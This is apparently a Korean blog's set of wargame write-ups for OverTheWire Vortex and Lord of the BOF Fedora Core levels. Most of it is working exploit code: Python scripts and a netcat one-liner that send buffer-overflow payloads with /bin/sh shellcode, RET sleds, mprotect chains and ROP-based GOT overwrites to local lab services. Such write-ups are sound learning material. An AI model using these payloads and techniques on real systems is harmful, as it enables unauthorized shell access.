SSo

vortex.labs.overthewire.org의 5842포트에 접속해서 4개의 unsigned integer를 받은 다음 그 값을 더해서 다시 보내면 계정과 비밀번호를 준다는 아주 쉬운 문제다.

python의 소켓을 이용하면 된다.

from socket import * 
import struct

host = "vortex.labs.overthewire.org"
port = 5842

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))

solve = int()
for i in range(0, 4): 
        res = s.recv(4)
        print struct.unpack('<I', res)[0]
        solve += struct.unpack('<I', res)[0]

print "solve : " + str(solve)
s.send(struct.pack('<I', solve))

print s.recv(100)
s.close()

문제 클리어

/*
        The Lord of the BOF : The Fellowship of the BOF
        - enigma
        - Remote BOF on Fedora Core 4
        - hint : ?
        - port : TCP 7777
*/

#include 
#include 
#include 
#include 

int vuln(int canary,char *ptr)
{
        char buffer[256];
        int *ret;

        // stack overflow!!
        strcpy(buffer,ptr);

        // overflow protected
        if(canary != 0x31337)
        {
                printf("who broke my canary?!");
                exit(1);
        }

        // preventing RTL
        ret = &canary - 1;
        if((*ret & 0xff000000) == 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }

        // clearing attack buffer
        memset(ptr, 0, 1024);

        return 0;
}

int main()
{
        char buffer[1024];

        printf("enigma : The brothers will be glad to have you!\n");
        printf("you : ");
        fflush(stdout);

        // give me a food!
        fgets(buffer, 1024, stdin);

        // oops~!
        vuln(0x31337, buffer);

        // bye bye
        exit(0);
}

from socket import *
import time
import struct

host = "localhost"
port = 7777

p = lambda x : struct.pack('<L', x)

shellcode = "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

leaveret = 0x0804858e
canary = 0x31337
mprotect = 0x86d240
stdin = 0xb7fa6000

payload = "A"*260
payload += p(stdin+268)
payload += p(leaveret)
payload += p(canary)
payload += p(mprotect)
payload += p(stdin+300)
payload += p(stdin)
payload += p(0x800)
payload += p(0x7)
payload += shellcode
payload += "\n"

index = 1
while True:
        print "INDEX : " + index
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, port))
        s.recv(100)
        s.send(payload)
        time.sleep(1)
        s.send("my-pass\n")
        res = s.recv(1024)
        if res != "":
                print "pass  : " + res
                s.close()
                break
        s.close()
        time.sleep(0.5)
        index += 1

문제 소스다.

일단 소스코드는 굉장히 간단해 보인다.

힌트에 나온 내용을 보면 fake ebp는 아닌 것 같고, RET Sleding을 하라고 한다.

그럼 힌트대로 RET Sleding을 해보자. 이전 문제들에서 RET Sleding을 해서 자신이 있다.

우선 스택의 값을 확인해 보자.

__gmon_start_는 strcpy 함수인것으로 보인다. 왜 저렇게 나온건지는 구글링 해서 조금 봤는데 무슨 말인지 이해가 안가서 일단은 문제부터 풀었다.

ebp-256이 argv[1]의 위치다.

따라서 256 바이트가 일반 버퍼의 사이즈고 그 뒤부터 sfp, ret다.

이제 RET Sleding을 몇번 줄지와 execl함수의 인자를 줄 적당한 위치를 찾아야 한다.

일단 함수의 ret부분에 BP를 걸고 멈춰서 스택을 살펴보자.

스택을 보면 0x008caff4가 있는 부분이 딱 적당하다.

이유는 아래와 같다.

0x008caff4는 심볼릭 링크로 주기 편한 값을 가지고 있고 바로 4바이트 뒤엔 NULL을 가리키고 있어서 딱 여기다.

그래서 RET Sleding을 7번 주고 바로 다음에 execl함수의 주소를 주면 익스가 성공할 것이다.

payload 

`python -c 'print "A"*260+"\x51\x84\x04\x08"*7+"\x68\x2d\x83"'`

exploit code

import os
import struct

p = lambda x : struct.pack('<L', x)
execl = "\x68\x2d\x83" #0x00832d68
ret = 0x8048451

payload = "A"*260
payload += p(ret) * 7
payload += execl

os.system('./cruel ' + payload)

쉘 획득

문제 소스코드다.

전전 문제와 비슷한 소스구조를 가지고 있고 힌트를 보면 GOT Overwrite다.

이번엔 인자로 받는게 아니라 elf를 실행하면 표준 입력을 받는다. 

이전 문제처럼 got overwrite로 풀어보려고 한다.

전전문제와 다른점은 0xf6ffe000부터 0x1200바이트를 0으로 memset한다.

gdb로 디버깅을 해보니 got overwrite하는 것과 무관해보이니 잘 풀릴 것 같다.

일단 got overwrite할 때 필요한 주소들과 가젯을 찾아본다.

system : 0x7507c0

printf@got : 0x804984c

strcpy@plt : 0x8048438

ppr : 0x80484f3

printf@plt : 0x8048408

/bin/sh : 0x833603

c0 : 0x80483e8+0xc

07 : 0x8048178+0x4

75 : 0x80482b4

00 : 0x8049804

bss : 08049868

이렇게 찾았다.

이번엔 bss영역 주소를 사용할 것이다.

먼저 ppr로 system함수의 주소를 bss영역으로 복사하고,

system함수의 주소가 있는 bss 영역을 다시 printf@got에 덮어쓸 거다.

got overwrite에 대한 자세한 설명은 이전문제와 비슷하니 생략할거다.

이번 문제는 단순 로컬에서 실행하면 root 권한으로 실행할 수 없다.

힌트로 준 8888포트에 nc로 붙으면 로컬에 있는 바이너리가 똑같이 실행된다.

8888포트로 서비스 중인 것을 확인할 수 있다.

이제 페이로드를 작성해 nc로 붙으면 익스가 가능할것이다.

payload

import struct
from socket import *

p = lambda x : struct.pack('<L', x)

printfgot = 0x804984c
#########      printfplt = 0x0804862c ###### printf@plt에 main+308주소를 주면 마지막에 더미값 4바이트를 주지 않고 익스가 가능하다. 왜 그런지는 잘 이해가 안가서 계속 생각중이다.
printfplt = 0x8048408
bbs = 0x08049868
ppr = 0x080484f3
strcpyplt = 0x8048438
binsh = "\x03\x36\x83\x00"

system = [0x80483e8+0xc, 0x8048178+0x4, 0x80482b4, 0x8049804]

payload = "A"*268
payload += p(strcpyplt) + p(ppr) + p(bbs+0) + p(system[0])
payload += p(strcpyplt) + p(ppr) + p(bbs+1) + p(system[1])
payload += p(strcpyplt) + p(ppr) + p(bbs+2) + p(system[2])
payload += p(strcpyplt) + p(ppr) + p(bbs+3) + p(system[3])
payload += p(strcpyplt) + p(ppr) + p(printfgot) + p(bbs)
payload += p(printfplt) + "AAAA" + binsh

host = "localhost"
port = 8888

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(payload + "\n")
print s.recv(1024)
while True:
        cmd = raw_input('$ ')
        if cmd == 'exit':
                s.close()
                break
        s.send(cmd + "\n")
        result = s.recv(1024)
        print result
s.close()

익스코드를 돌리니 쉘이 따진다.

ppr 정말 신기하다..

다음 단계로 넘어가니 더이상 문제가 없다고하네.. 올클리어.

이번 문제의 힌트는 got overwrite다.

함수의 got를 덮어써서 원하는 함수(system?)를 실행시키면 될 것 같다.

gdb에서 set명령으로 got를 바꾸어 보았지만 쉘이 안따졌다.

ROP로 문제를 풀어보았다.

ROP를 하기 위해 필요한 가젯과 주소들이 있다.

1. POP POP RET = 줄여서 ppr이라고 하겠다.

2. system() 주소

3. printf@plt

4. printf@got

5./bin/sh의 주소

1. ppr 주소

아래 명령어로 ppr 가젯의 위치를 구한다.

$ objdump -d evil_wizard | grep ret -B 3

ppr의 주소는 0x804854f다.

2. system() 주소

system함수 주소는 0x7507c0이다.

이제 system 함수의 조각들이 있는 위치를 각각 찾아야 한다.

명령어는 아래와 같다.

$ objdump -s [파일명] | grep [찾을 문자(열)] --color=auto

리틀엔디언 방식으로 입력해줘야 하니까 system[0]에 c0을 먼저 찾아 넣어야 한다.

c0의 주소는 0x8048414+0xc다.

07의 주소는 0x8048148+0xc다.

.

75의 주소는 0x80482c8이다.

00의 주소는 0x8049840이다.

3. printf@got

printf@got는 0x8049884다.

4. printf@plt 주소

printf@plt의 주소는 0x8048424다.

5. /bin/sh의 주소

#include <stdio.h>
int main()
{
        long shell=0x007507c0;
        while(memcmp((char*)shell,"/bin/sh",8)) shell++;
        printf("/bin/sh : 0x%x\n",shell);
}

/bin/sh의 주소는 c로 소스를 짜서 구할 수 있다.

/bin/sh의 주소는 0x833603이다.

이제 필요한 주소와 가젯을 다 찾았으니 payload를 작성하자.

payload 예시

"A"*268 + strcpy@plt + ppr + printf@got+0 + system[0]
               strcpy@plt + ppr + printf@got+1 + system[1]
               strcpy@plt + ppr + printf@got+2 + system[2]
               strcpy@plt + ppr + printf@got+3 + system[3]
               printf@plt + "AAAA" + "/bin/sh"

pop pop ret가젯으로 printf@got에 system 함수의 주소를 복사한 후 printf@plt를 실행해서 /bin/sh을 실행하는 페이로드다.

페이로드가 길므로 파이썬으로 익스를 짰다.

payload

import os
from struct import *

p = lambda x : pack('<L', x)

strcpyplt = 0x8048494
ppr = 0x804854f
printfplt = 0x8048424
printfgot = 0x8049884
binsh = "\x03\x36\x83"
system = [0x8048420, 0x8048374+4, 0x80482c8, 0x8049840]

payload = "A"*268
payload += p(strcpyplt) + p(ppr) + p(printfgot+0) + p(system[0])
payload += p(strcpyplt) + p(ppr) + p(printfgot+1) + p(system[1])
payload += p(strcpyplt) + p(ppr) + p(printfgot+2) + p(system[2])
payload += p(strcpyplt) + p(ppr) + p(printfgot+3)  + p(system[3])
payload += p(printfplt) + "AAAA" + binsh

os.execv("./evil_wizard",["",payload])

익스 성공

사이트 주소 : https://exploit-exercises.com/

사이트 메인화면이다.

여러개의 단계가 있는것으로 보이며 ISO 파일로 문제를 제공하는것 같다. 

Fedora Core 다 풀면 풀어봐야겠다.

힌트를 보고 got overwrite를 시도해봤다.

근데 생각대로 되지 않아서 검색을 해보다가 system함수를 이용해 문제를 푸는것을 알게되었다.

system 함수를 보자.

system 함수를 보면 do_system함수를 호출하는것을 볼 수 있다.

do_system 함수를 보자.

do_system 함수는 execve함수를 호출하게된다.

우선 do_system+1124부분을 보면 sigprocmask함수를 호출한 후 실행되는 부분이다.

여기 부분을 살펴보면 execve의 인자를 구성하는 단계로 상태를 보면 아래와 같다.

execve("/bin/sh", {"/home/dark_eyes/hell_fire", NULL}, envp)

이런식이다. 따라서 return address에 이 do_system+1124를 넣어주게 되면 hell_fire 이름으로 /bin/sh을 실행시키게된다. 

이 문제는 로컬 bof로 풀 수 없다. 로컬에 바이너리를 실행할때 루트권한을 주는 비트가 설정이 안되어있기 때문이다.

서비스중인 xinetd를 보니 7777포트에서 hell_fire가 서비스 중이다. netcat으로 접근하면 된다.

payload 

(python -c 'print "A"*268+"\x84\x07\x75\x00"';cat) | nc localhost 7777